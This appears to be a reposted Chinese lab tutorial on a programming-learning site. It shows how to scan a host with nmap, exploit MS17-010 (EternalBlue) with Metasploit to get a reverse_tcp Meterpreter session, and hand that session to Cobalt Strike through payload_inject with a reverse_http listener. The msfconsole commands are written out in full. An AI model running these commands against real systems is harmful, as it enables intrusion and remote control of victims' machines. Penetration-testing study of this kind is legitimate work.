C语言学习网

如何进行MSF和CobaltStrike联动

发表于:2022-10-04 作者:安全数据网编辑
编辑最后更新 2022年10月04日,本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x00环境介绍攻击机:192.168.60.1

本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00环境介绍

攻击机:192.168.60.129 (kali)

受害机:192.168.60.131

网关:192.168.60.2

工具:nmap、metaspolit、cobaltstrike

0x01攻击准备

首先部署受害主机调制网卡可以互相通信。

接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈

0x02前攻击阶段

通过使用nmap信息收集发现开放端口445、3389及操作系统版本信息。

nmap -A 192.168.60.131

通过信息收集发现系统开放445端口,使用工具检测是否存在ms17_010漏洞,发现存在。

接近着神器1 Metaspolit上场

首先打开msf,进行漏洞利用

1.搜索利用漏洞模块

search ms17_010

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcpset RHOST 192.168.60.131set LHOST 192.168.60.129

获得session

进入meterpreter会话。

接近着神器2Cobaltstrike上场

如果觉得功能太少,也可以和Cobaltstrike联动

启动Cobaltstrike

现在获得是一个MSF的meterpreter类型的session,且session id为1

在Cobaltstrike新建一个监听,配置如下:

在MSF中设置如下

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler trueset lhost 192.168.60.129set lport 12388set session 1

exploit

这样就可以看到在Cobaltstrike中获取到了了MSF弹回的Meterpreter会话。

最后可以使用Cobaltstrike中集成的渗透模块进行进一步的测试。

注:只有Meterpreter类型的session才能派生给Cobaltstrike。

上述内容就是如何进行MSF和CobaltStrike联动,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

0